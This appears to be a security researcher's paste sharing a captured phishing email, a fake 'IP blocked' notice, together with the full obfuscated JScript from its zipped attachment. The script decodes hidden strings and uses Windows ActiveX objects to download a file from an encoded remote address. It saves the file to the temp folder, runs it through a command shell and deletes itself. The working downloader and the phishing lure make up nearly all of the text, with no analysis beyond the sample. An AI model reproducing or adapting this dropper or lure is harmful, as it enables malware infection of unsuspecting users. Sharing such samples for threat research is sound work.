Malicious Email Javascript Zipped Attachment

1. Malicious Email
2.  
3. Subject: Internet Company Information Notice
4.  
5. Body:
6. Your IP: XXXX (Port:YYY) has been blocked in our network. Please be acknowledge that you will get disconnected on ZZZZZZZZZ. To unblock your IP address and continue using our services, please see the document down below.
7.  
8. Thank you for your time and attention.
9.  
10. *******
11. *******
12. *******
13.  
14. function phdODK(BDxzUxp) {
15.     function LudXBg() {
16.         return "ript.";
17.     }
18.     var VQZYECJk = LudXBg();
19.  
20.     function eLsQbm() {
21.         return 'eva';
22.     }
23.     function WsghAri(tYEReFjX) {
24.         return new Function('e', 'return ' + eLsQbm() + 'l(e);')(tYEReFjX);
25.     }
26.     if (WsghAri("typ" + "eof WSc" + VQZYECJk + "echo") == "unknown") {
27.         var eolFu = [''][0];
28.         var KglAhyte = 0;
29.         var zlqRuRIp = 'nlhkaaA';
30.     }
31.     var IomkXxz = zlqRuRIp.length;
32.     var LKHf = 0;
33.     var rmPSuo = "";
34.     var yeLKv = BDxzUxp.length;
35.     while (LKHf < yeLKv - 2) {
36.         var emltUT = [(0)][(0)];
37.         var heFEDHq = LKHf + 1;
38.         var owSGI = BDxzUxp.charAt(heFEDHq);
39.         var ycWKAbv = BDxzUxp.charAt(LKHf + 2);
40.         var wYoJj = BDxzUxp.charAt(LKHf);
41.         rmPSuo = wYoJj + owSGI + ycWKAbv;
42.         var EcqLhWq = BDxzUxp.charAt(LKHf);
43.         var DHYSdRz = BDxzUxp.charAt(LKHf + 1);
44.         var JqOlK102 = (DHYSdRz == 0);
45.         if (EcqLhWq == emltUT) {
46.             var yTcN = LKHf + 1;
47.             var lwhoMT = LKHf + 2;
48.             var JkfmRe = BDxzUxp.charAt(lwhoMT);
49.             rmPSuo = BDxzUxp.charAt(yTcN) + JkfmRe;
50.         }
51.         var UWEF = BDxzUxp.charAt(LKHf);
52.         var JqOlK101 = (UWEF == 0);
53.         if (JqOlK101 && JqOlK102) {
54.             var gjqTM = LKHf + 2;
55.             rmPSuo = BDxzUxp.charAt(gjqTM);
56.         }
57.         KglAhyte = parseInt(rmPSuo);
58.         var qUPdOk = LKHf / 3;
59.         var YqZQveK = qUPdOk % IomkXxz;
60.         var JqOlK = (zlqRuRIp + '').charCodeAt(YqZQveK);
61.         KglAhyte = KglAhyte ^ JqOlK;
62.         var wrWKyga = String;
63.         eolFu = eolFu + wrWKyga.fromCharCode(KglAhyte);
64.         var SCINs = 3;
65.         LKHf = LKHf + SCINs;
66.     }
67.     return eolFu;
68. }
69. var rbyiT = "041009028056017004034007013004045014013037011030";
70. var DbBpuAUJ = "061015026002017021040000011070045008013036061021027031004012014012006013008021";
71. var AOYPX = "041009028063004012049032013005014";
72. var jEbiJg = "058021024014";
73. var gjRDBZlli = "028025006";
74. var nxkc = "006024028027091078110028003006015004013050064015007006078012036010005009068006000045002009026018078080111011020013";
75. var NbFdixGWx = "060009027027014015050011046007015024";
76. var pyKrdRdO = "010009004014021004007007000013";
77. var wTGh = "062003027002021008046000";
78. var mhoG = "057063011025008017053064063000014013013";
79. var ekNXRV = "061015026002017021007027000004037000012036";
80. var zMIC = "045000007024004";
81. var ZTQdy = "047040039047035079018026030013010012";
82. var KoNFY = "001028013005";
83. var aELUR = "033028013005";
84. var phRDNZLl = "061024009031020018";
85. var hxl = "013001012069004025036078067011075";
86. var SYZHLtZ = "057063011025008017053";
87. var oRFeGp = "035063048038045083111054033036035053053017";
88. var hIKjgS = "057030001031004";
89. var xDYcEgLL = "061013030014053014007007000013";
90. var wdECYMIC = "026021024014014007097057063011025008017053064060009031009";
91. var fNdU = "029009006015";
92. var ckbEb = "041041060";
93. var PWP = "029024026002015006";
94. var wMPuUHf = phdODK(PWP);
95. var jrykew = phdODK(wdECYMIC);
96. var gKIjFTD = eval(jrykew);
97. var CZpfNHnu = phdODK(SYZHLtZ);
98. var ZkyU = eval(CZpfNHnu);
99.  
100. function COrh() {
101.     if (gKIjFTD == wMPuUHf) {
102.         var DpbVOlZk = phdODK(oRFeGp);
103.         var fVBpAvSx = ZkyU;
104.         var RMeFurZy = phdODK(nxkc);
105.         var jXlbB = new ActiveXObject(DpbVOlZk);
106.         var cwoowz = phdODK(ZTQdy);
107.         var CuJR = phdODK(ckbEb);
108.         jXlbB[phdODK(KoNFY)](CuJR, RMeFurZy, 0);
109.         jXlbB[phdODK(fNdU)]();
110.         var fKsdBfhh = phdODK(DbBpuAUJ);
111.         var yhYPrW = new ActiveXObject(fKsdBfhh);
112.     }
113.     if (jXlbB[phdODK(phRDNZLl)] == 200) {
114.         var sxBu = new ActiveXObject(cwoowz);
115.         var QIrpQTKA = phdODK(AOYPX);
116.         var GGvZJWe = '\\' + yhYPrW[QIrpQTKA]();
117.         var dEqkDgBz = yhYPrW[phdODK(rbyiT)](2) + GGvZJWe;
118.         sxBu[phdODK(aELUR)]();
119.         var UXIo = phdODK(mhoG);
120.         sxBu[phdODK(jEbiJg)] = 1;
121.         var yXiONczo = new ActiveXObject(UXIo);
122.         var gUifEek = jXlbB[phdODK(NbFdixGWx)];
123.         sxBu[phdODK(hIKjgS)](gUifEek);
124.         sxBu[phdODK(wTGh)] = 0;
125.         sxBu[phdODK(xDYcEgLL)](dEqkDgBz);
126.         sxBu[phdODK(zMIC)]();
127.         var iOMtsT = phdODK(hxl) + dEqkDgBz;
128.         yXiONczo[phdODK(gjRDBZlli)](iOMtsT, 0);
129.     }
130.     var RaPPJeGi = fVBpAvSx[phdODK(ekNXRV)];
131.     yhYPrW[phdODK(pyKrdRdO)](RaPPJeGi);
132. }
133. if (gKIjFTD == wMPuUHf) {
134.     try {
135.         COrh();
136.     } catch (e) {}
137. }
138.  
139. *******
140. *******
141. *******
142. More FROM @neonprimetime security
143.  
144. http://pastebin.com/u/Neonprimetime
145. https://www.virustotal.com/en/USER/neonprimetime/
146. https://twitter.com/neonprimetime
147. https://www.reddit.com/USER/neonprimetime